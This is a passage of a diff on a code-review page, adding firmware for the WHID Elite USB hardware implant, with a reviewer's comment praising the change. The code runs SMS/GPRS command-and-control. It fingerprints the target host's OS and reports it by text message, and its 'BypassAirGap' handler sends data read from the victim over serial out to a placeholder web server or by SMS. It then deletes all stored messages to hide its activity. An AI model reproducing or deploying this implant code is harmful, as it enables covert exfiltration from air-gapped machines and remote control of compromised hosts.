WHID_Elite_HybridCC_v.1.0/WHID_Elite_HybridCC_v.1.0.ino

```diff
@@ -0,0 +1,463 @@
+            Serial.println(F("Failed to turn off GPRS"));
+          //send SMS
+          delay(1500);
+          fona.sendSMS(callerIDbuffer, replybuffer);
+        }
+        
+        //####### enumos: ##########
+        //# Enumerate Target's OS
+        //##########################
+        else if (strncmp(smsBuffer, "enumos:", 7) == 0) {
+          delay(500);
+          String os;
+          FingerprintUSBHost.guessHostOS(os);
+          char opsys[os.length() + 1];
+          os.toCharArray(opsys, os.length() + 1);
+          delay(200);
+          fona.sendSMS(callerIDbuffer, opsys);
+        }
+        //####### batt: ############
+        //# Get Battery Percentage
+        //##########################
+        else if (strncmp(smsBuffer, "batt:", 5) == 0) {
+          uint16_t vbat;   
+          delay(500);
+          //fona.getBattVoltage(&vbat);
+          fona.getBattPercent(&vbat);
+          uint8_t tbat = (uint8_t)vbat;
+          String batt = String(tbat);
+          char battZ[batt.length() + 1];
+          batt.toCharArray(battZ, batt.length() + 1);
+          fona.sendSMS(callerIDbuffer, battZ);
+          Serial.print(F("Batt % = "));
+          Serial.println(battZ);     
+         }
+        else {
+          if(dontSMS != 1)
+            //dontSMS=2;
+          Serial.println(F("No reply!"));
+        }
+      }
+    
+      String cmd = Serial.readStringUntil(':');
+      
+      if (dontGPRS == 1 && cmd == "BAG") {
+        String BypassAirGap = Serial.readString();
+        BypassAirGap.toCharArray(gprsAirgap, 50);
+        delay(500);
+        int gprsAirgapSize = strlen(gprsAirgap);
+        delay(1000);
+        fonaSerial->println("AT+HTTPINIT");
+        delay(1000);
+        fonaSerial->println("AT+HTTPPARA=\"CID\",1");
+        delay(2000);
+        fonaSerial->println("AT+HTTPPARA=\"URL\",\"URLYOURWEBSERVER.com\""); // example: whid.elite.com
+        delay(2000);
+        fonaSerial->print("AT+HTTPDATA=");
+        fonaSerial->print(gprsAirgapSize);
+        fonaSerial->println(",5000");
+        delay(500);
+
+        ///// DEBUG //////////////////////////////////
+      /*  Serial.print("Airgap: ");
+        Serial.println(BypassAirGap);
+        Serial.print("gprsAirgap: ");
+        Serial.println(gprsAirgap); */
+        //////////////////////////////////////////////
+
+        fonaSerial->println(gprsAirgap);
+        delay(500);
+        fonaSerial->println("AT+HTTPACTION = 1");
+      }
+      else if (dontSMS == 0 && cmd == "BAG") {
+        String BypassAirGap = Serial.readStringUntil('\n');
+        fona.sendSMS(callerIDbuffer, BypassAirGap.c_str());
+      }
+      delay(500);
+      //Ack received message.(Comment it if wanna save SMSes)
+      if(dontSMS == 0)
+        fona.sendSMS(callerIDbuffer, "CMD ACKed & EXECed");
+      else if(dontSMS == 2)
+        //dontSMS = 0;
+      
+      delay(1500);
+      fonaSerial->print("AT+CMGDA=\"DEL ALL\"\r\n");    
+    }
+  }
+}
```

Comment:
Overall, I really like the boolean flag approach to activate/deactivate the HybridC2!
That's why I love OpenSource! People comes out with interesting approaches I never thought of! 😄